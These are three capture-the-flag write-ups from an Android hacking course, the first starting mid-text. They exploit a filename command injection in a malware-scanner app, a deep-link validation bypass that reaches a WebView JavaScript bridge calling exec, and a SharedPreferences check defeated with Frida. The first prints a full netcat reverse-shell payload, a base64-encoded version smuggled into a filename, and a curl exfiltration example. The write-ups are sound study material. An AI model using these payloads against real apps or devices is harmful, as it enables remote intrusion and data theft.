            .directory(Environment.getExternalStorageDirectory())
            .redirectErrorStream(true)
            .start();

        InputStream inputStream = process.getInputStream();
        BufferedReader reader = new BufferedReader(
            new InputStreamReader(inputStream, Charsets.UTF_8)
        );

        String output = reader.readLine();
        String fileHash = output.split("  ")[0];

        return !KNOWN_MALWARE_SAMPLES.containsValue(fileHash);
    } catch (Exception e) {
        return false;
    }
}

As soon as I saw input file being sent to sh -c I understood this is the vulnerability!

The code constructs a shell command by concatenating "toybox sha1sum " with file.getAbsolutePath() without any sanitization. If I control the filename, I can inject arbitrary commands!

The attack chain became clear:

1. The app has MANAGE_EXTERNAL_STORAGE permission, that means it can access filesystem

2. ScanService periodically scans all files in /sdcard/

3. scanFile() executes: sh -c "toybox sha1sum /sdcard/<filename>"

4. If the filename contains shell metacharacters like |;&&, I can inject commands!

For example, if I create a file named test.txt;id, the executed command becomes:

sh -c "toybox sha1sum /sdcard/test.txt;id"

This executes TWO commands:

1. toybox sha1sum /sdcard/test.txt

2. id

I also wanted to confirm if the scan was actually running. I used adb logcat to monitor the output:

adb logcat | grep "System.out"

01-24 07:42:56.375 16078 16188 I System.out: /storage/emulated/0/Pictures/.gs_fs0/.0.jpg...SAFE
01-24 07:42:56.416 16078 16188 I System.out: /storage/emulated/0/Pictures/.gs_fs0/.1.jpg...SAFE
01-24 07:42:56.479 16078 16188 I System.out: starting file scan...
01-24 07:42:56.528 16078 16188 I System.out: finished file scan!

I needed a way to exfiltrate data, the command would run, but in a real world scenario how would I get back the command output?

The Challenge - Getting Command Output

I tried escalating to Remote Code Execution, but faced several challenges:

Challenge 1: No Direct Output

The stdout from injected commands wasn't visible to me. I needed to exfiltrate data somehow, in a real world scenario this is ideal.

Challenge 2: Limited Tools

Android's toybox doesn't include curl or wget for easy HTTP exfiltration otherwise we could have done curl attack.com?val=$(exfil), would have been much simpler but no curl and no wget.

Challenge 3: Filename Restrictions

Some special characters (|, >, <) couldn't be used in filenames due to filesystem restrictions.

Setting Up a Reverse Shell

The app has INTERNET permission, so I decided to use nc (netcat) for a reverse shell.

On my machine:

nc -lvp 4444

The payload I wanted to execute:

rm /tmp/f
mkfifo /tmp/f
cat /tmp/f | sh -i 2>&1 | nc 192.168.0.11 4444 > /tmp/f

This creates a named pipe for bidirectional communication, giving me an interactive shell.

First Attempt - The /tmp Problem

I first tested the reverse shell manually via adb shell:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 192.168.0.11 4444 > /tmp/f
```

**Error:**
```
mkfifo: /tmp/f: No such file or directory

The /tmp directory didn't exist on this Android device!

Second Attempt - /sdcard/ Restrictions

I tried using /sdcard/ instead:

rm /sdcard/f; mkfifo /sdcard/f; cat /sdcard/f | sh -i 2>&1 | nc 192.168.0.11 4444 > /sdcard/f
```

**Error:**
```
mkfifo: /sdcard/f: Invalid argument

The /sdcard filesystem doesn't support special files like FIFOs (named pipes)!

The Working Solution - /data/local/tmp

Finally, I used /data/local/tmp/, which is a standard writable location on Android, I remembered this path because this is where we put the frida server binaries,

rm /data/local/tmp/f; mkfifo /data/local/tmp/f; cat /data/local/tmp/f | sh -i 2>&1 | nc 192.168.0.11 4444 > /data/local/tmp/f
```

This worked perfectly! I got the shell prompt:
```
Connection received on 192.168.0.13 36092
d2s:/storage/emulated/0 #

Now I just needed to figure out how to put this entire command into a filename.

The Filename Problem

I tried creating the malicious filename directly:

~/mobilehackinglab ✗ adb shell 'touch "/sdcard/x.txt;rm /data/local/tmp/f;mkfifo /data/local/tmp/f;cat /data/local/tmp/f|sh -i 2>&1|nc 192.168.0.11 4444>/data/
local/tmp/f"'
touch: '/sdcard/x.txt;rm /data/local/tmp/f;mkfifo /data/local/tmp/f;cat /data/local/tmp/f|sh -i 2>&1|nc 192.168.0.11 4444>/data/local/tmp/f': No such file or directory

The Solution - Base64 Encoding

I realized I could bypass filename restrictions by base64-encoding the payload and decoding it at runtime.

Step 1: Encode the payload

echo 'rm /data/local/tmp/f;mkfifo /data/local/tmp/f;cat /data/local/tmp/f|sh -i 2>&1|nc 192.168.0.11 4444>/data/local/tmp/f' | base64

cm0gL2RhdGEvbG9jYWwvdG1wL2Y7bWtmaWZvIC9kYXRhL2xvY2FsL3RtcC9mO2NhdCAvZGF0YS9sb2NhbC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguMC4xMSA0NDQ0Pi9kYXRhL2xvY2FsL3RtcC9m

Now creating malicious filename

adb shell su -c 'touch "/sdcard/x.txt;echo cm0gL2RhdGEvbG9jYWwvdG1wL2Y7bWtmaWZvIC9kYXRhL2xvY2FsL3RtcC9mO2NhdCAvZGF0YS9sb2NhbC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguMC4xMSA0NDQ0Pi9kYXRhL2xvY2FsL3RtcC9mCg==|base64 -d|sh"'

This worked! The filename only contains alphanumeric characters, semicolons, and pipes within the base64 string.

Achieving RCE

On my machine:

nc -lvp 4444

Listening on 0.0.0.0 4444

I waited for the scanner to run (it scans every 6 seconds based on the code).

d2s:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:magisk:s0
d2s:/ # whoami
root
d2s:/ # ls /data/data/com.mobilehackinglab.cyclicscanner
cache
code_cache
files
d2s:/ #

SUCCESS! we have a remote shell! 🎉

The Complete Attack Chain

1. Vulnerability: Command injection in ScanEngine.scanFile() via unsanitized filename

2. Access Vector: Write malicious file to /sdcard/ (accessible to any app with storage permission)

3. Trigger: ScanService automatically scans the file within 6 seconds

4. Payload Delivery: Base64-encoded reverse shell to bypass filename restrictions

5. Execution: Injected command creates a reverse shell using named pipes and netcat

6. Impact: Full reverse shell

Most important Takeaway

Named pipes for reverse shells - Using mkfifo to create bidirectional communication channels is essential when tools like nc -e aren't available.

Disclaimer: While all technical work and problem-solving was done by me, this writeup was edited with assistance from an LLM to improve grammar, clarity, and flow.

Challenge Name: Guess Me ; Android Deep Link Challenge

Objective: Exploit a deep link vulnerability in an Android application to achieve Remote Code Execution (RCE)

This CTF styled lab was part of the free android hacking course from mobilehackinglab.com on exploiting deeplinks and achieving RCE.

Manifest Recon

When I first looked at this challenge, I knew I had to to find how the app handles deep links. My initial recon focused on the AndroidManifest.xml file.

<activity
    android:name="com.mobilehackinglab.guessme.WebviewActivity"
    android:exported="true">
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data
            android:scheme="mhl"
            android:host="mobilehackinglab"/>
    </intent-filter>
</activity>

What this tells me is:

• The WebviewActivity is exported

• It accepts deep links with the scheme mhl://mobilehackinglab

Analyzing the WebviewActivity

I decompiled the APK and examined the WebviewActivity class. The onCreate method had two interesting function calls at the end:

• loadAssetIndex() - loads a local HTML file

• handleDeepLink(getIntent()) - processes incoming deep links

The loadAssetIndex() function seemed like a honeypot, just loading file:///android_asset/index.html. I spent a good time thinking this could be the entrypoint. But yes it was likely a honeypot.

The real action was in handleDeepLink()

Understanding Deep Link Validation

The handleDeepLink() function was one critical piece:

private final void handleDeepLink(Intent intent) {
    Uri uri = intent != null ? intent.getData() : null;
    if (uri != null) {
        if (isValidDeepLink(uri)) {
            loadDeepLink(uri);
        } else {
            loadAssetIndex();
        }
    }
}

It validates the deep link and either loads it or falls back to the local asset. Because we know the above local asset was likely a honeypot, lets focus on isValidDeepLink()

private final boolean isValidDeepLink(Uri uri) {
    if ((!Intrinsics.areEqual(uri.getScheme(), "mhl") && 
         !Intrinsics.areEqual(uri.getScheme(), "https")) || 
        !Intrinsics.areEqual(uri.getHost(), "mobilehackinglab")) {
        return false;
    }
    String queryParameter = uri.getQueryParameter("url");
    return queryParameter != null && 
           StringsKt.endsWith$default(queryParameter, "mobilehackinglab.com", false, 2, (Object) null);
}

If you observe this function, it accepts certain format for the deeplink schema and returns True if it meets the requirements.

Validation Requirements:

1. Scheme must be mhl OR https

2. Host must be mobilehackinglab

3. Must have a url query parameter

4. The url parameter must end with mobilehackinglab.com (This is a very critical piece later during exploitation)

These are some of the valid deeplinks this function accepts

mhl://mobilehackinglab/?url=mobilehackinglab.com
mhl://mobilehackinglab/?url=testmobilehackinglab.com
mhl://mobilehackinglab/?url=test.mobilehackinglab.com
mhl://mobilehackinglab/?url=example.com?mobilehackinglab.com

All of these are accepted due to endsWith

You could open the WebView with this adb shell am start -a android.intent.action.VIEW -c android.intent.category.BROWSABLE -d "mhl://mobilehackinglab/?url=mobilehackinglab.com and you can see the webview with mobilehackinglab page.

The validation only checks if the URL ends with mobilehackinglab.com, not if it is mobilehackinglab.com. This is a classic bypass opportunity for us!

I was stuck here for a while now what next?

The "Aha!" Moment

While analyzing the WebviewActivity, I noticed something critical in the onCreate method:

webView3.addJavascriptInterface(new MyJavaScriptInterface(), "AndroidBridge");

JavaScript is enabled, and there was a custom interface exposed

public final class MyJavaScriptInterface {
    @JavascriptInterface
    public final void loadWebsite(String url) {
        // loads a URL in the webview
    }

    @JavascriptInterface
    public final String getTime(String Time) throws IOException {
        try {
            Process process = Runtime.getRuntime().exec(Time);
            InputStream inputStream = process.getInputStream();
            // ... reads output ...
            return text;
        } catch (Exception e) {
            return "Error getting time";
        }
    }
}

WAIT, WHAT?!

The getTime() method takes user input and passes it directly to Runtime.getRuntime().exec()! This is command injection! Anytime you see where user input lands into exec, you know its going to be fun!

Connecting the Dots - The Attack Chain

Now I had all the pieces:

1. I can trigger a deep link to load a URL I control (with validation bypass)

2. That URL loads in a WebView with JavaScript enabled

3. JavaScript can access AndroidBridge.getTime(command)

4. getTime() executes arbitrary system commands!

Malicious Deep Link → Load Our Payload Webpage → JavaScript calls AndroidBridge.getTime("command") → RCE!

Crafting the Exploit

Challenge: How do I control the loaded URL while satisfying the validation?

The validation checks if the url parameter ends with mobilehackinglab.com. I can use URL query parameters or could use #

You can observe that the google.com is rendered because its a valid scheme accepted by the app because it also ends with mobilehackinglab.com

adb shell am start -a android.intent.action.VIEW -c android.intent.category.BROWSABLE -d "mhl://mobilehackinglab/?url=google.com/search?q=mobilehackinglab.com"

Bypass Technique:

https://redacted.com?whatever=mobilehackinglab.com

This URL:

• Ends with mobilehackinglab.com

• Loads content from redacted.com when passed to webView.loadUrl()

• This will meet all the criteria and load the page

I created a very basic POC to begin with,

<html>
<body onload="alert(1)">
</body>
</html>

Hosted it using Python:

python3 -m http.server 8000
ngrok http 8000

Basic Poc Test

adb shell am start -a android.intent.action.VIEW \
  -c android.intent.category.BROWSABLE \
  -d "mhl://mobilehackinglab?url=https://e42d280f9baf.ngrok-free.app?qry=mobilehackinglab.com"

You can see that js functions are executing! Which is a solid win, now lets focus on exploiting this in real world scenario.

Setting Up My Malicious Server

Now that we know js is being executed, lets execute some commands to see if rce is possible, now if you remember the interface, it was AndroidBridge and the function that was accepting custom user input was getTime, hence we use AndroidBridge.getTime("command")

I created a simple HTML payload:

<html>
    <body>
        <script>
            var output = AndroidBridge.getTime("ls");
            alert(output);
        </script>
    </body>
</html>

Same hosted using python and ngrok

When I triggered the deep link, the WebView loaded my malicious page, the JavaScript executed, and I got an alert showing the output of the ls command, the entire Android filesystem!

Rce was achieved :party:

Concepts and Further reads

addJavascriptInterface() is an Android WebView API that exposes Java/Kotlin methods to JavaScript code running in the web page. This creates a bridge between web content and native Android functionality. If not properly secured, it allows malicious JavaScript to call sensitive Android APIs or, in this case, execute system commands.

• Basic Deeplink Introduction

• Deep Links & WebViews Exploitations

• Remediation for Javascript Interface Injection

Disclaimer: While all technical work and problem-solving was done by me, this writeup was edited with assistance from an LLM to improve grammar, clarity, and flow.

I installed the app on my test phone and there was literally nothing on the ui just a text saying “Hello from C++”.

The Initial Recon

The next phase was to start with recon, using jadx-gui, I opened the apk and checked the manifest file,
There were 2 activities that were exported=”true” but one caught my attention

<activity
    android:name="com.mobilehackinglab.challenge.Activity2"
    android:exported="true">
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data
            android:scheme="mhl"
            android:host="labs"/>
    </intent-filter>
</activity>

This activity is exported but also has defined uri schema hence it accepts the deeplink with mhl://labs URI scheme. This looked like an entry point to me.

Any exported activities like this, can be started using adb shell am start com.mobilehackinglab.challenge/.Activity2

But because it has uri schema, we could open the activity by simply passing the deeplink adb shell am start -a android.intent.action.VIEW -d "mhl://labs/"

I opened the activity using this deeplink, but the activity closes almost immediately.

Diving Into Activity2

Using jadx, I started going through Activity2's onCreate method, I would recommend reading Android Activity lifecycle which will give you a clear view of when onCreate() methods are executed during an activity. Understanding the lifecycle flow will help you quickly find out the entry point of the application.

protected void onCreate(Bundle savedInstanceState) throws BadPaddingException, NoSuchPaddingException, IllegalBlockSizeException, NoSuchAlgorithmException, InvalidKeyException, InvalidAlgorithmParameterException {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_2);
        SharedPreferences sharedPreferences = getSharedPreferences("DAD4", 0);
        String u_1 = sharedPreferences.getString("UUU0133", null);
        boolean isActionView = Intrinsics.areEqual(getIntent().getAction(), "android.intent.action.VIEW");
        boolean isU1Matching = Intrinsics.areEqual(u_1, cd());
        if (isActionView && isU1Matching) {
            // core logic redacted
            }
            finishAffinity();
            finish();
            System.exit(0);
            return;
        }
        finishAffinity();
        finish();
        System.exit(0);
    }

The most important thing here is the if condition - when it's not true, the app calls finishAffinity() and System.exit(0), which is exactly what happens when you open the activity.

Here's where things seemed exciting to me:

SharedPreferences sharedPreferences = getSharedPreferences("DAD4", 0);
String u_1 = sharedPreferences.getString("UUU0133", null);
boolean isActionView = Intrinsics.areEqual(getIntent().getAction(), "android.intent.action.VIEW");
boolean isU1Matching = Intrinsics.areEqual(u_1, cd());

If you have done android app development before, SharedPreferences is Android's key-value storage for saving small amounts of primitive data (strings, ints, booleans) that persists across app sessions.
Here, it is trying to retrieve a string value stored under the key "UUU0133" from a preferences file named "DAD4" (returns null if not found).

Immediately I went inside the device shell looked into this path /data/data/com.mobilehackinglab.challenge/shared_prefs to see if there are any SharedPreferences file, the filename should be DAD4.xml as evident from the code above. Unfortunately there were none.

This statement

boolean isActionView = Intrinsics.areEqual(getIntent().getAction(), "android.intent.action.VIEW");
boolean isU1Matching = Intrinsics.areEqual(u_1, cd());

• First line is doing checks if the app was launched via a VIEW intent, this means the deeplink should be opened with the action VIEW, -a android.intent.action.VIEW, which we were already doing

• The second statement, is troublesome, if you check it is comparing the values of u_1 from SharedPreferences with the return value of cd().
  The second statement compares the value of u_1 from SharedPreferences with the return value of cd(). For isU1Matching to be true, both values need to be equal. Since u_1 is currently null and cd() returns today's date, they don't match and the condition fails.

• Our goal is to somehow make the if condition true, because SharedPreferences value was definitely null, lets check if cd() returns null somehow.

private final String cd() {
        SimpleDateFormat sdf = new SimpleDateFormat("dd/MM/yyyy", Locale.getDefault());
        String str = sdf.format(new Date());
        Intrinsics.checkNotNullExpressionValue(str, "format(...)");
        Activity2Kt.cu_d = str;
        String str2 = Activity2Kt.cu_d;
        if (str2 != null) {
            return str2;
        }
        Intrinsics.throwUninitializedPropertyAccessException("cu_d");
        return null;
    }

The cd() function returns today's date in dd/MM/yyyy format, and does not return null in any way for sure. Now we are left with only one option, the if condition would be set to true only when in SharedPreferences current date is stored as the above format. I searched the project for the DAD4 keyword to see if there is anywhere else the SharedPreferences was being set to. I found this in MainActivity

public final void KLOW() {
    SharedPreferences sharedPreferences = getSharedPreferences("DAD4", 0);
    SharedPreferences.Editor editor = sharedPreferences.edit();
    SimpleDateFormat sdf = new SimpleDateFormat("dd/MM/yyyy", Locale.getDefault());
    String cu_d = sdf.format(new Date());
    editor.putString("UUU0133", cu_d);
    editor.apply();
}

So the SharedPreferences values were being stored from KLOW() but there were 0 usage for this function, hence we saw no SharedPreferences were being set, u1 was therefore always null and the condition would always fail.

Now we have two options, we could use Frida to set SharedPreferences value, given we know how the values will look like, for example something like this, this is a rough idea how it should work, not actual code.

Java.perform(() => {
    var Context = Java.use("android.content.Context");
    var ActivityThread = Java.use("android.app.ActivityThread");
    var currentApplication = ActivityThread.currentApplication();
    var context = currentApplication.getApplicationContext();

    var sharedPreferences = context.getSharedPreferences("DAD4", 0);
    var editor = sharedPreferences.edit();

    var SimpleDateFormat = Java.use("java.text.SimpleDateFormat");
    var Date = Java.use("java.util.Date");
    var Locale = Java.use("java.util.Locale");

    var sdf = SimpleDateFormat.$new("dd/MM/yyyy", Locale.getDefault());
    var currentDate = sdf.format(Date.$new());

    editor.putString("UUU0133", currentDate);
    editor.apply();
});

OR we could make KLOW() execute!

We don't need the app to call KLOW() - we could just call it with Frida. My first attempt was using Java.choose() to find an existing MainActivity instance and call the method:

Java.perform(() => {
    setTimeout(() => {
        Java.choose("com.mobilehackinglab.challenge.MainActivity", {
            onMatch: function(instance) {
                instance.KLOW();
            },
            onComplete: function() {}
        });
    }, 1000);
});

What this does is hook into the MainActivity and executes the KLOW() function, thereby writing the SharedPreferences value.

This hook can be executed using this command frida -U -f com.mobilehackinglab.challenge -l script.js

Once SharedPreferences values were set, I checked the path and saw the DAD4.xml file with the value

d2s:/ # cd /data/data/com.mobilehackinglab.challenge/shared_prefs
d2s:/data/data/com.mobilehackinglab.challenge/shared_prefs # ls
DAD4.xml
d2s:/data/data/com.mobilehackinglab.challenge/shared_prefs # cat DAD4.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="UUU0133">22/01/2026</string>
</map>
d2s:/data/data/com.mobilehackinglab.challenge/shared_prefs #

Now the if condition was true and if you open the deeplink again, you see the activity once again closes because if you check the code

 if (isActionView && isU1Matching) {
            Uri uri = getIntent().getData();
            if (uri != null && Intrinsics.areEqual(uri.getScheme(), "mhl") && Intrinsics.areEqual(uri.getHost(), "labs")) {
                String base64Value = uri.getLastPathSegment();
                byte[] decodedValue = Base64.decode(base64Value, 0);
                if (decodedValue != null) {
                    String ds = new String(decodedValue, Charsets.UTF_8);
                    byte[] bytes = "your_secret_key_1234567890123456".getBytes(Charsets.UTF_8);
                    Intrinsics.checkNotNullExpressionValue(bytes, "this as java.lang.String).getBytes(charset)");
                    String str = decrypt("AES/CBC/PKCS5Padding", "bqGrDKdQ8zo26HflRsGvVA==", new SecretKeySpec(bytes, "AES"));
                    if (str.equals(ds)) {
                        System.loadLibrary("flag");
                        String s = getflag();
                        Toast.makeText(getApplicationContext(), s, 1).show();
                        return;
                    } else {
                        finishAffinity();
                        finish();
                        System.exit(0);
                        return;
                    }
                }
                finishAffinity();
                finish();
                System.exit(0);
                return;
            }

Even if the first condition match, there is this line that is checking the lastPathSegment of the deeplink URI

String base64Value = uri.getLastPathSegment();
byte[] decodedValue = Base64.decode(base64Value, 0); //indicates the value is b64 of something

getLastPathSegment() returns the last segment of the uri, for example if the uri is mhl://labs/helloworld, then the helloworld would be returned as getLastPathSegment()

This block is probably the most compelling part

 String str = decrypt("AES/CBC/PKCS5Padding", "bqGrDKdQ8zo26HflRsGvVA==", new SecretKeySpec(bytes, "AES"));
                    if (str.equals(ds)) {
                        System.loadLibrary("flag");
                        String s = getflag();
                        Toast.makeText(getApplicationContext(), s, 1).show();
                        return;
                    }

Here, it is doing AES decryption of bqGrDKdQ8zo26HflRsGvVA== and the flag would be loaded only when our b64(lastPathSegment) == aes_decryption(“bqGrDKdQ8zo26HflRsGvVA==“)

Lets check the function that does decryption

public final String decrypt(String algorithm, String cipherText, SecretKeySpec key) throws BadPaddingException, NoSuchPaddingException, IllegalBlockSizeException, NoSuchAlgorithmException, InvalidKeyException, InvalidAlgorithmParameterException {
        Intrinsics.checkNotNullParameter(algorithm, "algorithm");
        Intrinsics.checkNotNullParameter(cipherText, "cipherText");
        Intrinsics.checkNotNullParameter(key, "key");
        Cipher cipher = Cipher.getInstance(algorithm);
        try {
            byte[] bytes = Activity2Kt.fixedIV.getBytes(Charsets.UTF_8);
            Intrinsics.checkNotNullExpressionValue(bytes, "this as java.lang.String).getBytes(charset)");
            IvParameterSpec ivSpec = new IvParameterSpec(bytes);
            cipher.init(2, key, ivSpec);
            byte[] decodedCipherText = Base64.decode(cipherText, 0);
            byte[] decrypted = cipher.doFinal(decodedCipherText);
            Intrinsics.checkNotNull(decrypted);
            return new String(decrypted, Charsets.UTF_8);
        } catch (Exception e) {
            throw new RuntimeException("Decryption failed", e);
        }
    }

If you check this line, Activity2Kt.fixedIV it is getting the IV values from Activity2Kt, which is this

public final class Activity2Kt {
    private static String cu_d = null;
    public static final String fixedIV = "1234567890123456";
}

So we have everything to decrypt this aes value

• algorithm,

• cipherText,

• SecretKey,

• IV

I used this website https://anycript.com/crypto to do so,

So the decrypted string is “mhl_secret_1337“. If you remember the getLastPathSegment() was also being base64 encoded, hence our uri becomes

mhl://labs/base64(mhl_secret_1337)

Now lets open the activity again using the new deeplink, replace that base64(mhl_secret_1337) with actual values

   adb shell am start -a android.intent.action.VIEW -d "mhl://labs/bWhsX3NlY3JldF8xMzM3"

The activity opens with success toast message. When you closely check the code,

String s = getflag();
Toast.makeText(getApplicationContext(), s, 1).show();

This is funny, I thought the flag would be on the toast, but MHL made it fun by only returning success from the getflag()!

So getflag() is returning "success"? That didn't seem right for a CTF flag. I thought maybe I should hook getflag() to see what it's actually returning. But even when I hook, I would surely get the same “success” as return value.

Reading The Hints Again

That's when I re-read the challenge hints:

"Utilize Frida for tracing or employ Frida's memory scanning" "Don't have to spend time on static analysis of the Android library, as the code is obfuscated"

They're telling not to try to reverse engineer or trace the native library. It's obfuscated anyway. The flag string has to exist somewhere in memory - probably hardcoded in the library and maybe I should just scan for it.

So I wrote this in Frida

Java.perform(() => {
    var module = Process.findModuleByName("libflag.so");

    Memory.scan(module.base, module.size, "4D 48 4C 7B", {  // "MHL{" in hex
        onMatch: function(address, size) {
            console.log('Found at: ' + address);
            console.log('Flag: ' + Memory.readUtf8String(address));
        },
        onComplete: function() {
            console.log('Scan complete');
        }
    });
});

This is basically finding the module libflag, when it matches, scans the memory, and finds the one matching with the hex value as our flag MHL{ as instructed in the challenge description. You must trigger the deeplink first so that libflag.so loads into the memory, otherwise memory scan will not work.

And there it was. The actual flag, sitting in the library's memory.

Very fun to play with!

Links and References for further study

• Android Activity LifeCycle

• Frida Memory Scan

• Memory Scanning in Frida

Disclaimer: While all technical work and problem-solving was done by me, this writeup was edited with assistance from an LLM to improve grammar, clarity, and flow.